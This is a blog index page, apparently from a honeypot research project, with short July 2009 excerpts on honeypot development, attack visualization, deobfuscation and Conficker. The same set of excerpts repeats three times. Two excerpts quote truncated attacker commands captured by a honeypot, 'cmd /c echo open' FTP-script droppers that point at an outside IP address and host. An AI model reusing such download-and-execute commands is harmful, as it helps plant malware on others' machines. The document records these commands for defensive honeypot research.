Blog

July 26, 2009

Iteolih: malicious ftp services

Yesterday, I got an incomplete, but successful, attack on my honeypot, the attackers remote code execution looked like this: WinExec("cmd /c echo open 78.1.96.200 4871 > […]
July 24, 2009

Spanish Chapter Status Report For 2008

ORGANIZATION The Spanish Honeynet Project chapter primary areas of interest and development are wireless honeynets, web honeypots, data collecting and analyzing and research technical papers to […]
July 22, 2009

Glastopf’s new vulnerability emulator

The number of attacks against the Webhoneypot depends strongly on his PHP parser. So keeping the pattern matching mechanism up to date was one of the […]
July 21, 2009

Iteolih: If you can’t touch it …

While playing with the current hsoc code, I got attacked, and saw an offer to download something from somewhere.cmd /c echo open v1.usbupdatestrings.at 4356 > i&echo […]
July 14, 2009

Visualization Experiments

Most of my work in the past few weeks has been focusing on the visualization aspect of the project.  One thing that I am trying to […]
July 13, 2009

A review to what we have done yet

Our work mainly focuses on DOM simulation. I believe the following is the most important for deobfuscation, but we also do lot more so that our […]
July 11, 2009

Iteolih: SMB/RPC efforts

During the last weeks I have been working on SMB and specifically DCERPC support for the Dionaea next generation low-interaction honeypot (buzz!). SMB / CIFS is […]
July 10, 2009

Conficker.A going down?

Conficker contains a piece of code that has been object of speculation: It does not infect boxes located in the Ukraine. Before sending an exploit, it […]
July 26, 2009

Iteolih: malicious ftp services

Yesterday, I got an incomplete, but successful, attack on my honeypot, the attackers remote code execution looked like this: WinExec("cmd /c echo open 78.1.96.200 4871 > […]
July 24, 2009

Spanish Chapter Status Report For 2008

ORGANIZATION The Spanish Honeynet Project chapter primary areas of interest and development are wireless honeynets, web honeypots, data collecting and analyzing and research technical papers to […]
July 22, 2009

Glastopf’s new vulnerability emulator

The number of attacks against the Webhoneypot depends strongly on his PHP parser. So keeping the pattern matching mechanism up to date was one of the […]
July 21, 2009

Iteolih: If you can’t touch it …

While playing with the current hsoc code, I got attacked, and saw an offer to download something from somewhere.cmd /c echo open v1.usbupdatestrings.at 4356 > i&echo […]
July 14, 2009

Visualization Experiments

Most of my work in the past few weeks has been focusing on the visualization aspect of the project.  One thing that I am trying to […]
July 13, 2009

A review to what we have done yet

Our work mainly focuses on DOM simulation. I believe the following is the most important for deobfuscation, but we also do lot more so that our […]
July 11, 2009

Iteolih: SMB/RPC efforts

During the last weeks I have been working on SMB and specifically DCERPC support for the Dionaea next generation low-interaction honeypot (buzz!). SMB / CIFS is […]
July 10, 2009

Conficker.A going down?

Conficker contains a piece of code that has been object of speculation: It does not infect boxes located in the Ukraine. Before sending an exploit, it […]
July 26, 2009

Iteolih: malicious ftp services

Yesterday, I got an incomplete, but successful, attack on my honeypot, the attackers remote code execution looked like this: WinExec("cmd /c echo open 78.1.96.200 4871 > […]
July 24, 2009

Spanish Chapter Status Report For 2008

ORGANIZATION The Spanish Honeynet Project chapter primary areas of interest and development are wireless honeynets, web honeypots, data collecting and analyzing and research technical papers to […]
July 22, 2009

Glastopf’s new vulnerability emulator

The number of attacks against the Webhoneypot depends strongly on his PHP parser. So keeping the pattern matching mechanism up to date was one of the […]
July 21, 2009

Iteolih: If you can’t touch it …

While playing with the current hsoc code, I got attacked, and saw an offer to download something from somewhere.cmd /c echo open v1.usbupdatestrings.at 4356 > i&echo […]
July 14, 2009

Visualization Experiments

Most of my work in the past few weeks has been focusing on the visualization aspect of the project.  One thing that I am trying to […]
July 13, 2009

A review to what we have done yet

Our work mainly focuses on DOM simulation. I believe the following is the most important for deobfuscation, but we also do lot more so that our […]
July 11, 2009

Iteolih: SMB/RPC efforts

During the last weeks I have been working on SMB and specifically DCERPC support for the Dionaea next generation low-interaction honeypot (buzz!). SMB / CIFS is […]
July 10, 2009

Conficker.A going down?

Conficker contains a piece of code that has been object of speculation: It does not infect boxes located in the Ukraine. Before sending an exploit, it […]